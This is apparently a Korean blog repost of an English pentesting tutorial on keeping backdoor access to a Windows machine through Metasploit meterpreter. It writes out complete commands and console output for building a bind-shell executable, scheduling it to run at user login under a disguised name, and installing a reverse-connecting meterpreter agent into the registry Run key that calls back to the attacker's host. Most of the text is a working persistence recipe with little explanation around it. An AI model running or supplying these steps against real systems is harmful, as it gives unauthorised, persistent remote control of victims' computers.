metasploit에서 meterpreter 자동실행
카테고리 없음 2012. 3. 13. 13:27 |
Posted on 25-09-2010
Metasploit: Dropping Backdoor Through a Meterpreter Session.
Filed Under (metasploit, pentesting, security) by admin
First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where you backdoor will be running waiting for connections.
Second, use “scheduleme” script to upload and launch your backdoor. Here the backdoor will execute at user login.
meterpreter > run scheduleme -e evil.exe -l
[*] Checking if UAC is enabled …..
[*] Error Checking UAC: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 87
[*] Uploading /root/evil.exe….
[*] /root/evil.exe uploaded!
[*] Scheduling command C:\Users\jorge\AppData\Local\Temp\svhost40.exe to run login…..
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck22 /F
Third, start a handler, and wait for the user to login
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(handler) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -z
[*] Starting the payload handler…
[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.50:53416 -> 192.168.1.100:4444) at 2010-09-26 02:14:32 -0400
[*] Session 1 created in the background.
And you have your backdoor session!
The second method is using meterpreter as a backdoor/service, to achieve this we run script “persistent.”
First, we’ll configure the backdoor to run when user logs on, and try every 90 sec on port 443 back to our attacker box.
meterpreter > run persistence -U -i 90 -p 443 -r 192.168.1.50
[*] Creating a persistent agent: LHOST=192.168.1.50 LPORT=443 (interval=10 onboot=true)
[*] Persistent agent script is 614108 bytes long
[*] Uploaded the persistent agent to C:\Users\jorge\AppData\Local\Temp\IzaNxiTRxM.vbs
[*] Agent executed with PID 3544
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sKYHNhXOcQC
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sKYHNhXOcQC
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/VISTA-VBOX_20100926.3032/clean_up__20100926.3032.rc
Second, start the handler and wait for our session.
use exploit/multi/handler
msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.50
lhost => 192.168.1.50
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > exploit -z
[*] Started reverse handler on 192.168.1.50:443
[*] Starting the payload handler…
[*] Sending stage (748544 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.50:443 -> 192.168.1.100:49289) at 2010-09-26 02:31:19 -0400
[*] Session 2 created in the background.